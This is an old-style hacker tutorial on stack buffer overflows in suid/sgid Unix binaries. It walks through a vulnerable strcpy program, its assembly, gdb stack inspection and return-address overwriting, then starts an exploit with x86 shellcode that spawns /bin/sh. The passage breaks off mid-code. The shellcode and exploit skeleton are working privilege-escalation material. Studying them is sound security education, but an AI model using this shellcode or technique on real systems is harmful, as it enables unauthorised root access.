An Introduction to executing arbitrary code via stack overflows
---------------------------------------------------------------

Before we delve into the technical details, here's a little background.

Suid/sgid binaries
------------------

One of the problems with multiuser operating systems is that you will
eventually need to allow users to perform functions which require root
privileges -- be it changing a password, gecos field information, or
accessing restricted devices. Rather than give the user complete control
over the system by giving them root privileges, you can make a program that
does what the user wants as root, so that they cannot do anything that may
compromise system security. You do this with a suid/sgid binary:

-rwsr-xr-x   1 root     root        44705 Jul  1 00:49 /usr/bin/passwd

When a user (whoever he/she may be) executes /usr/bin/passwd, the process
runs with the effective uid of the file's owner, root (for an sgid binary,
the effective gid of the file's group), instead of the user's own. Once the
program exits, the user is back in their shell with their usual uid/gid.
Unfortunately, people who write suid/sgid bins have to be very careful not
to do anything on the user's behalf that may compromise security. One of
the things that suid/sgid writers have to be careful of is copying data
into buffers without a limit on the number of characters that may be
copied. This is where we come in. By copying more data than the buffer can
contain we can overwrite important parts of the stack and execute arbitrary
code.

Overflow sploits
----------------

ok.. what is an overflow sploit? Well.. let's have a look at some code:

   void main(int argc, char **argv, char **envp) {
      char s[1024];
      strcpy(s,getenv("TERM"));
   }

This is a really common piece of code.. and many a sploit is based around
just this kind of oversight. So exactly what is wrong with this and how can
we exploit it? ok.. let's have a look. Suppose this file is called "simple".

$ export TERM="01234567890123456789012345678901234567890123456789012345678
90123456789012345678901234567890123456789012345678901234567890123456789012
34567890123456789012345678901234567890123456789012345678901234567890123456
78901234567890123456789012345678901234567890123456789012345678901234567890
12345678901234567890123456789012345678901234567890123456789012345678901234
56789012345678901234567890123456789012345678901234567890123456789012345678
90123456789012345678901234567890123456789012345678901234567890123456789012
34567890123456789012345678901234567890123456789012345678901234567890123456
78901234567890123456789012345678901234567890123456789012345678901234567890
12345678901234567890123456789012345678901234567890123456789012345678901234
56789012345678901234567890123456789012345678901234567890123456789012345678
90123456789012345678901234567890123456789012345678901234567890123456789012
34567890123456789012345678901234567890123456789012345678901234567890123456
78901234567890123456789012345678901234567890123456789012345678901234567890
123456789"
$ ./simple
Segmentation fault

In case you missed that first bit.. we're setting the variable TERM to over
1024 characters. We then execute simple and it gives us a segmentation
fault. Why? Well, to understand that we need to know exactly what is
happening. Do the following:

$ cat simple.c
#include <stdlib.h>
#include <string.h>

void main(int argc,char **argv,char **envp) {
   char s[1024];
   strcpy(s,getenv("TERM"));
}
$ gcc simple.c -S
$ cat simple.s
        .file   "simple.c"
        .version        "01.01"
gcc2_compiled.:
.section        .rodata
.LC0:
        .string "TERM"
.text
        .align 16
.globl main
        .type    main,@function
main:
        pushl %ebp
        movl %esp,%ebp
        subl $1024,%esp
        pushl $.LC0
        call getenv
        addl $4,%esp
        movl %eax,%eax
        pushl %eax
        leal -1024(%ebp),%eax
        pushl %eax
        call strcpy
        addl $8,%esp
.L1:
        movl %ebp,%esp
        popl %ebp
        ret
.Lfe1:
        .size    main,.Lfe1-main
        .ident  "GCC: (GNU) 2.7.0"
$

ok.. that's a fair bit of output, and to make sense of it we need to know a
little x86 asm.
That's a little beyond the scope of this article, so you might want to check
out a book or two.. Anyway.. here are the important bits of that output:

        pushl %ebp
        movl %esp,%ebp
        subl $1024,%esp
        ..
        ret

The first two lines are called "setting up a stack frame" and are a standard
part of code compiled by a C compiler. The third line allocates space on
the stack for the "s" variable in our C code back up there. From this we
can get an idea of what the stack looks like:

        +-------------+ -1024(%ebp)
        | 1024 bytes  | (s variable)
        +-------------+ 0(%ebp)
        |     ebp     |
        +-------------+ 4(%ebp)
        |  ret addr   |
        +-------------+ 8(%ebp)
        |    argc     |
        +-------------+ 12(%ebp)
        |    argv     |
        +-------------+ 16(%ebp)
        |    envp     |
        +-------------+

ok.. so what happens when we do a strcpy of an environment variable TERM
that is bigger than 1024 bytes? We start copying to -1024(%ebp), go on to
-1023(%ebp) and so on, and we SHOULD stop before 0(%ebp), but we don't. We
keep going and copy over the value of ebp stored on the stack and then the
return address. So what happens when we get to that ret down the bottom?
Well, the return address has been overwritten and destroyed, so it ends up
jumping into the middle of nowhere; that is, unless we make it jump to
somewhere useful.

GDB - your new friend
---------------------

GDB is the GNU symbolic debugger. Using this useful util we can actually
look at what happens.
Our previous example:

$ export TERM="01234567890123456789012345678901234567890123456789012345678
90123456789012345678901234567890123456789012345678901234567890123456789012
34567890123456789012345678901234567890123456789012345678901234567890123456
78901234567890123456789012345678901234567890123456789012345678901234567890
12345678901234567890123456789012345678901234567890123456789012345678901234
56789012345678901234567890123456789012345678901234567890123456789012345678
90123456789012345678901234567890123456789012345678901234567890123456789012
34567890123456789012345678901234567890123456789012345678901234567890123456
78901234567890123456789012345678901234567890123456789012345678901234567890
12345678901234567890123456789012345678901234567890123456789012345678901234
56789012345678901234567890123456789012345678901234567890123456789012345678
90123456789012345678901234567890123456789012345678901234567890123456789012
34567890123456789012345678901234567890123456789012345678901234567890123456
78901234567890123456789012345678901234567890123456789012345678901234567890
123456789"
$ gdb simple
GDB is free software and you are welcome to distribute copies of it
 under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.14 (i486-slackware-linux), Copyright 1995 Free Software Foundation,
Inc...(no debugging symbols found)...
(gdb) break main
Breakpoint 1 at 0x80004e9
(gdb) run
Starting program: simple

Breakpoint 1, 0x80004e9 in main ()
(gdb) disass
Dump of assembler code for function main:
0x80004e0 <main>:       pushl  %ebp
0x80004e1 <main+1>:     movl   %esp,%ebp
0x80004e3 <main+3>:     subl   $0x400,%esp
0x80004e9 <main+9>:     pushl  $0x8000548
0x80004ee <main+14>:    call   0x80003d8
0x80004f3 <main+19>:    addl   $0x4,%esp
0x80004f6 <main+22>:    movl   %eax,%eax
0x80004f8 <main+24>:    pushl  %eax
0x80004f9 <main+25>:    leal   0xfffffc00(%ebp),%eax
0x80004ff <main+31>:    pushl  %eax
0x8000500 <main+32>:    call   0x80003c8
0x8000505 <main+37>:    addl   $0x8,%esp
0x8000508 <main+40>:    movl   %ebp,%esp
0x800050a <main+42>:    popl   %ebp
0x800050b <main+43>:    ret
0x800050c <main+44>:    nop
0x800050d <main+45>:    nop
0x800050e <main+46>:    nop
0x800050f <main+47>:    nop
End of assembler dump.
(gdb) break *0x800050b
Breakpoint 2 at 0x800050b
(gdb) cont
Continuing.

Breakpoint 2, 0x800050b in main ()
(gdb) stepi
0x37363534 in __fpu_control ()
(gdb) stepi

Program received signal SIGSEGV, Segmentation fault.
0x37363534 in __fpu_control ()
(gdb)

ok.. so we get a segmentation fault.. why? Well, because the ret jumped to
address 0x37363534 and there's no code there. Let's have a look at the
stack as it is before the copy:

$ gdb simple
GDB is free software and you are welcome to distribute copies of it
 under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.14 (i486-slackware-linux), Copyright 1995 Free Software Foundation,
Inc...(no debugging symbols found)...
(gdb) break main
Breakpoint 1 at 0x80004e9
(gdb) run
Starting program: simple

Breakpoint 1, 0x80004e9 in main ()
(gdb) info registers
eax            0x0      0
ecx            0xc      12
edx            0x0      0
ebx            0x0      0
esp            0xbffff800       0xbffff800
ebp            0xbffffc04       0xbffffc04
esi            0x50000000       1342177280
edi            0x50001df0       1342184944
eip            0x80004ee        0x80004ee
ps             0x382    898
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x2b     43
gs             0x2b     43
(gdb) x/5xw 0xbffffc04
0xbffffc04 <__fpu_control+3087001064>:  0xbffff8e8  0x08000495  0x00000001  0xbffffc18
0xbffffc14 <__fpu_control+3087001080>:  0xbffffc20
(gdb)

The first value here (0xbffff8e8) is the caller's ebp, saved by the
pushl %ebp at the top of main. The next value (0x08000495) is the return
address. The 0x00000001 is argc, 0xbffffc18 is argv and 0xbffffc20 is envp.

So if we were to copy 1024 + 8 bytes we could overwrite the return address
and make it jump back to our code (that we also copy there). So let's cut
to the chase. If we set TERM to a run of nops, followed by our code,
followed by the new return address, then when we get to the ret it'll
return into the nops and continue down to the code, which executes a shell.
The only problem we have now is what the return address should be. The
perfect return address would be 0xbffff804 (the start of s), but it's
rather unlikely that we would have that information when we write the
sploit, so we try to estimate it. Here is the sploit for our "simple"
example:

long get_esp(void)
{
   __asm__("movl %esp,%eax\n");
}

char *realegg =
   "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
   "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
   "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

/*char *realegg="\xeb\xfe\0";*/

char s[1034];
int i;
char *s1;

#define STACKFRAME (0xc00 - 0x818)

void main(int argc,char **argv,char **envp)
{
   strcpy(s,"TERM=");
   s1 = s+5;
   while (s1